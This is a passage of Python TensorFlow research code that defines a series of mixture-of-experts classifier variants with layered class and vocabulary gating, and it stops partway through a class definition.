The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
shape = model_input.get_shape().as_list()[1]
class_size = FLAGS.class_size
probabilities_by_class = self.sub_model(model_input,vocab_size,name="pre")
probabilities_by_vocab = probabilities_by_class
vocab_input = model_input
for i in range(FLAGS.moe_layers):
class_input_1 = slim.fully_connected(
probabilities_by_vocab,
class_size,
activation_fn=tf.nn.elu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs1-%s" % i)
class_input_2 = slim.fully_connected(
1-probabilities_by_vocab,
class_size,
activation_fn=tf.nn.elu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs2-%s" % i)
class_input_1 = tf.nn.l2_normalize(class_input_1,dim=1)*tf.sqrt(tf.cast(class_size,dtype=tf.float32)/shape)
class_input_2 = tf.nn.l2_normalize(class_input_2,dim=1)*tf.sqrt(tf.cast(class_size,dtype=tf.float32)/shape)
vocab_input = tf.concat((vocab_input,class_input_1,class_input_2),axis=1)
probabilities_by_vocab = self.sub_model(vocab_input,vocab_size,name="-%s" % i)
if i<FLAGS.moe_layers-1:
probabilities_by_class = tf.concat((probabilities_by_class,probabilities_by_vocab),axis=1)
final_probabilities = probabilities_by_vocab
return {"predictions": final_probabilities, "predictions_class": probabilities_by_class}
class MoeNegativeModel(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
gate_activations = slim.fully_connected(
model_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates_pos")
expert_activations = slim.fully_connected(
model_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts_pos")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class_and_batch = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
final_probabilities_pos = tf.reshape(probabilities_by_class_and_batch,
[-1, vocab_size])
gate_activations = slim.fully_connected(
model_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates_neg")
expert_activations = slim.fully_connected(
model_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts_neg")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class_and_batch = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
final_probabilities_neg = tf.reshape(probabilities_by_class_and_batch,
[-1, vocab_size])
final_probabilities = final_probabilities_pos/(final_probabilities_pos + final_probabilities_neg + 1e-6)
return {"predictions": final_probabilities, "predictions_positive": final_probabilities_pos,
"predictions_negative": final_probabilities_neg}
class MoeMaxModel(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
gate_activations = slim.fully_connected(
model_input,
vocab_size * (num_mixtures+1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
model_input,
vocab_size*num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
expert_others = slim.fully_connected(
model_input,
vocab_size,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="others")
expert_activations = tf.reshape(expert_activations,[-1,vocab_size,num_mixtures])
forward_indices = []
backward_indices = []
for i in range(num_mixtures):
forward_indice = np.arange(vocab_size)
np.random.seed(i)
np.random.shuffle(forward_indice)
backward_indice = np.argsort(forward_indice,axis=None)
forward_indices.append(forward_indice)
backward_indices.append(backward_indice)
forward_indices = tf.constant(np.stack(forward_indices,axis=1),dtype=tf.int32)*num_mixtures + tf.reshape(tf.range(num_mixtures),[1,-1])
backward_indices = tf.constant(np.stack(backward_indices,axis=1),dtype=tf.int32)*num_mixtures + tf.reshape(tf.range(num_mixtures),[1,-1])
forward_indices = tf.stop_gradient(tf.reshape(forward_indices,[-1]))
backward_indices = tf.stop_gradient(tf.reshape(backward_indices,[-1]))
expert_activations = tf.transpose(tf.reshape(expert_activations,[-1,vocab_size*num_mixtures]))
expert_activations = tf.transpose(tf.gather(expert_activations,forward_indices))
expert_activations = tf.reshape(expert_activations,[-1,vocab_size,num_mixtures])
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures+1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_softmax = tf.transpose(expert_activations,perm=[0,2,1])
expert_softmax = tf.concat((tf.reshape(expert_softmax,[-1,num_mixtures]),tf.reshape(expert_others,[-1,1])),axis=1)
expert_distribution = tf.nn.softmax(tf.reshape(
expert_softmax,
[-1, num_mixtures+1])) # (Batch * #Labels) x num_mixtures
expert_distribution = tf.reshape(expert_distribution[:,:num_mixtures],[-1,num_mixtures,vocab_size])
expert_distribution = tf.reshape(tf.transpose(expert_distribution,perm=[0,2,1]),[-1,vocab_size*num_mixtures])
expert_distribution = tf.transpose(tf.gather(tf.transpose(expert_distribution),backward_indices))
expert_distribution = tf.reshape(expert_distribution,[-1,num_mixtures])
probabilities_by_class_and_batch = tf.reduce_sum(gating_distribution[:, :num_mixtures] * expert_distribution, 1)
final_probabilities = tf.reshape(probabilities_by_class_and_batch,[-1, vocab_size])
final_probabilities_experts = tf.reshape(expert_distribution,[-1, vocab_size, num_mixtures])
if FLAGS.moe_method=="ordered":
seq = np.loadtxt("labels_ordered.out")
tf_seq = tf.constant(seq,dtype=tf.int32)
final_probabilities = tf.gather(tf.transpose(final_probabilities),tf_seq)
final_probabilities = tf.transpose(final_probabilities)
elif FLAGS.moe_method=="unordered":
seq = np.loadtxt("labels_unordered.out")
tf_seq = tf.constant(seq,dtype=tf.int32)
final_probabilities = tf.gather(tf.transpose(final_probabilities),tf_seq)
final_probabilities = tf.transpose(final_probabilities)
return {"predictions": final_probabilities, "predictions_experts": final_probabilities_experts}
class MoeMaxMixModel(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
class_size = 25
class_input = slim.fully_connected(
model_input,
model_input.get_shape().as_list()[1],
activation_fn=tf.nn.relu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs")
class_gate_activations = slim.fully_connected(
class_input,
class_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_gates")
class_expert_activations = slim.fully_connected(
class_input,
class_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_experts")
class_gating_distribution = tf.nn.softmax(tf.reshape(
class_gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
class_expert_distribution = tf.nn.sigmoid(tf.reshape(
class_expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class = tf.reduce_sum(
class_gating_distribution[:, :num_mixtures] * class_expert_distribution, 1)
probabilities_by_class = tf.reshape(probabilities_by_class,
[-1, class_size])
vocab_input = tf.concat((model_input,probabilities_by_class), axis=1)
gate_activations = slim.fully_connected(
vocab_input,
vocab_size * (num_mixtures+1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
vocab_input,
vocab_size*num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
expert_others = slim.fully_connected(
vocab_input,
vocab_size,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="others")
expert_activations = tf.reshape(expert_activations,[-1,vocab_size,num_mixtures])
forward_indices = []
backward_indices = []
for i in range(num_mixtures):
forward_indice = np.arange(vocab_size)
np.random.seed(i)
np.random.shuffle(forward_indice)
backward_indice = np.argsort(forward_indice,axis=None)
forward_indices.append(forward_indice)
backward_indices.append(backward_indice)
forward_indices = tf.constant(np.stack(forward_indices,axis=1),dtype=tf.int32)*num_mixtures + tf.reshape(tf.range(num_mixtures),[1,-1])
backward_indices = tf.constant(np.stack(backward_indices,axis=1),dtype=tf.int32)*num_mixtures + tf.reshape(tf.range(num_mixtures),[1,-1])
forward_indices = tf.stop_gradient(tf.reshape(forward_indices,[-1]))
backward_indices = tf.stop_gradient(tf.reshape(backward_indices,[-1]))
expert_activations = tf.transpose(tf.reshape(expert_activations,[-1,vocab_size*num_mixtures]))
expert_activations = tf.transpose(tf.gather(expert_activations,forward_indices))
expert_activations = tf.reshape(expert_activations,[-1,vocab_size,num_mixtures])
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures+1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_softmax = tf.transpose(expert_activations,perm=[0,2,1])
expert_softmax = tf.concat((tf.reshape(expert_softmax,[-1,num_mixtures]),tf.reshape(expert_others,[-1,1])),axis=1)
expert_distribution = tf.nn.softmax(tf.reshape(
expert_softmax,
[-1, num_mixtures+1])) # (Batch * #Labels) x num_mixtures
expert_distribution = tf.reshape(expert_distribution[:,:num_mixtures],[-1,num_mixtures,vocab_size])
expert_distribution = tf.reshape(tf.transpose(expert_distribution,perm=[0,2,1]),[-1,vocab_size*num_mixtures])
expert_distribution = tf.transpose(tf.gather(tf.transpose(expert_distribution),backward_indices))
expert_distribution = tf.reshape(expert_distribution,[-1,num_mixtures])
probabilities_by_class_and_batch = tf.reduce_sum(gating_distribution[:, :num_mixtures] * expert_distribution, 1)
final_probabilities = tf.reshape(probabilities_by_class_and_batch,[-1, vocab_size])
return {"predictions": final_probabilities, "predictions_class": probabilities_by_class}
class MoeKnowledgeModel(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
class_size = FLAGS.class_size
shape = model_input.get_shape().as_list()[1]
seq = np.loadtxt(FLAGS.class_file)
tf_seq = tf.constant(seq,dtype=tf.float32)
gate_activations = slim.fully_connected(
model_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
model_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_class = tf.reshape(probabilities_by_class,
[-1, vocab_size])
probabilities_by_vocab = probabilities_by_class
vocab_input = model_input
for i in range(FLAGS.moe_layers):
class_input_1 = slim.fully_connected(
probabilities_by_vocab,
class_size,
activation_fn=tf.nn.elu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs1-%s" % i)
class_input_2 = tf.matmul(probabilities_by_vocab,tf_seq)
class_input_2 = slim.fully_connected(
class_input_2,
class_size,
activation_fn=tf.nn.elu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs2-%s" % i)
class_input_1 = tf.nn.l2_normalize(class_input_1,dim=1)*tf.sqrt(tf.cast(class_size,dtype=tf.float32)/shape)
class_input_2 = tf.nn.l2_normalize(class_input_2,dim=1)*tf.sqrt(tf.cast(class_size,dtype=tf.float32)/shape)
vocab_input = tf.concat((vocab_input,class_input_1,class_input_2),axis=1)
gate_activations = slim.fully_connected(
vocab_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates-%s" % i)
expert_activations = slim.fully_connected(
vocab_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts-%s" % i)
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_vocab = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_vocab = tf.reshape(probabilities_by_vocab,
[-1, vocab_size])
if i<FLAGS.moe_layers-1:
probabilities_by_class = tf.concat((probabilities_by_class,probabilities_by_vocab),axis=1)
final_probabilities = probabilities_by_vocab
return {"predictions": final_probabilities, "predictions_class": probabilities_by_class}
class MoeMixModel(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
class_size = FLAGS.encoder_size
class_input = slim.fully_connected(
model_input,
model_input.get_shape().as_list()[1],
activation_fn=tf.nn.relu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs")
class_gate_activations = slim.fully_connected(
class_input,
class_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_gates")
class_expert_activations = slim.fully_connected(
class_input,
class_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_experts")
class_gating_distribution = tf.nn.softmax(tf.reshape(
class_gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
class_expert_distribution = tf.nn.sigmoid(tf.reshape(
class_expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class = tf.reduce_sum(
class_gating_distribution[:, :num_mixtures] * class_expert_distribution, 1)
probabilities_by_class = tf.reshape(probabilities_by_class,
[-1, class_size])
vocab_input = tf.concat((model_input, probabilities_by_class), axis=1)
gate_activations = slim.fully_connected(
vocab_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
vocab_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_vocab = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_vocab = tf.reshape(probabilities_by_vocab,
[-1, vocab_size])
final_probabilities = probabilities_by_vocab
return {"predictions": final_probabilities, "predictions_class": probabilities_by_class}
class MoeMixExtendModel(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
num_extends = FLAGS.moe_num_extend
class_size = FLAGS.encoder_size
model_input_stop = tf.stop_gradient(model_input)
class_input = slim.fully_connected(
model_input_stop,
model_input.get_shape().as_list()[1],
activation_fn=tf.nn.relu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs")
class_gate_activations = slim.fully_connected(
class_input,
class_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_gates")
class_expert_activations = slim.fully_connected(
class_input,
class_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_experts")
class_gating_distribution = tf.nn.softmax(tf.reshape(
class_gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
class_expert_distribution = tf.nn.sigmoid(tf.reshape(
class_expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class = tf.reduce_sum(
class_gating_distribution[:, :num_mixtures] * class_expert_distribution, 1)
probabilities_by_class = tf.reshape(probabilities_by_class,
[-1, class_size])
vocab_input = tf.concat((model_input, probabilities_by_class),axis=1)
gate_activations = slim.fully_connected(
vocab_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
vocab_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_vocab = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
final_probabilities = tf.reduce_max(tf.reshape(probabilities_by_vocab,
[-1, num_extends, vocab_size]),axis=1)
probabilities_by_class = tf.reduce_mean(tf.reshape(probabilities_by_class,
[-1, num_extends, class_size]),axis=1)
return {"predictions": final_probabilities, "predictions_class": probabilities_by_class}
class MoeMix2Model(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
class_size = FLAGS.encoder_size
hidden_channels = FLAGS.hidden_channels
shape = model_input.get_shape().as_list()[1]
class_input = slim.fully_connected(
model_input,
shape,
activation_fn=tf.nn.relu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs")
class_gate_activations = slim.fully_connected(
class_input,
class_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_gates")
class_expert_activations = slim.fully_connected(
class_input,
class_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_experts")
class_gating_distribution = tf.nn.softmax(tf.reshape(
class_gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
class_expert_distribution = tf.nn.sigmoid(tf.reshape(
class_expert_activations,
[-1,class_size, num_mixtures])) # (Batch * #Labels) x num_mixtures
class_expert_distribution = tf.reshape(class_expert_distribution,[-1,num_mixtures])
probabilities_by_class = tf.reduce_sum(
class_gating_distribution[:, :num_mixtures] * class_expert_distribution, 1)
"""
class_expert_activations = slim.fully_connected(
class_input,
class_size,
activation_fn=tf.nn.relu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_experts")
probabilities_by_class = slim.fully_connected(
class_expert_activations,
class_size,
activation_fn=tf.nn.softmax,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="probabilities_by_class")"""
probabilities_by_class = tf.reshape(probabilities_by_class,
[-1, class_size])
vars = np.loadtxt(FLAGS.autoencoder_dir+'autoencoder_layer%d.model' % FLAGS.encoder_layers)
weights = tf.constant(vars[:-1,:],dtype=tf.float32)
bias = tf.reshape(tf.constant(vars[-1,:],dtype=tf.float32),[-1])
class_output = tf.nn.relu(tf.nn.xw_plus_b(probabilities_by_class,weights,bias))
class_output = tf.nn.l2_normalize(class_output,dim=1)*tf.sqrt(tf.cast(class_size,dtype=tf.float32)/shape)
vocab_input = tf.concat((model_input, class_output), axis=1)
gate_activations = slim.fully_connected(
vocab_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
vocab_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_vocab = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_vocab = tf.reshape(probabilities_by_vocab,
[-1, vocab_size])
final_probabilities = probabilities_by_vocab
"""
final_probabilities = tf.reshape(probabilities_by_class,[-1,class_size*hidden_channels])
for i in range(FLAGS.encoder_layers, FLAGS.encoder_layers*2):
var_i = np.loadtxt(FLAGS.autoencoder_dir+'autoencoder_layer%d.model' % i)
weight_i = tf.constant(var_i[:-1,:],dtype=tf.float32)
bias_i = tf.reshape(tf.constant(var_i[-1,:],dtype=tf.float32),[-1])
final_probabilities = tf.nn.xw_plus_b(final_probabilities,weight_i,bias_i)
if i<FLAGS.encoder_layers*2-1:
final_probabilities = tf.nn.relu(final_probabilities)
else:
final_probabilities = tf.nn.sigmoid(final_probabilities)"""
return {"predictions": final_probabilities, "predictions_encoder": probabilities_by_class}
class MoeMix3Model(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
class_size = FLAGS.encoder_size
hidden_channels = FLAGS.hidden_channels
shape = model_input.get_shape().as_list()[1]
class_input = slim.fully_connected(
model_input,
shape,
activation_fn=tf.nn.relu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs")
class_gate_activations = slim.fully_connected(
class_input,
class_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_gates")
class_expert_activations = slim.fully_connected(
class_input,
class_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_experts")
class_gating_distribution = tf.nn.softmax(tf.reshape(
class_gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
class_expert_distribution = tf.reshape(class_expert_activations,[-1,num_mixtures])
probabilities_by_class = tf.reduce_sum(
class_gating_distribution[:, :num_mixtures] * class_expert_distribution, 1)
probabilities_by_class = tf.reshape(probabilities_by_class,
[-1, class_size])
hidden_mean = tf.reduce_mean(probabilities_by_class,axis=1,keep_dims=True)
hidden_std = tf.sqrt(tf.reduce_mean(tf.square(probabilities_by_class-hidden_mean),axis=1,keep_dims=True))
probabilities_by_class = (probabilities_by_class-hidden_mean)/(hidden_std+1e-6)
hidden_2 = tf.nn.relu(probabilities_by_class)
vars = np.loadtxt(FLAGS.autoencoder_dir+'autoencoder_layer%d.model' % FLAGS.encoder_layers)
weights = tf.constant(vars[:-1,:],dtype=tf.float32)
bias = tf.reshape(tf.constant(vars[-1,:],dtype=tf.float32),[-1])
class_output = tf.nn.relu(tf.nn.xw_plus_b(hidden_2,weights,bias))
#class_output = probabilities_by_class
class_output = tf.nn.l2_normalize(class_output,dim=1)*tf.sqrt(tf.cast(class_size,dtype=tf.float32)/shape)
vocab_input = tf.concat((model_input, class_output), axis=1)
gate_activations = slim.fully_connected(
vocab_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
vocab_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_vocab = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_vocab = tf.reshape(probabilities_by_vocab,
[-1, vocab_size])
final_probabilities = probabilities_by_vocab
return {"predictions": final_probabilities, "predictions_encoder": probabilities_by_class}
class MoeMix4Model(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
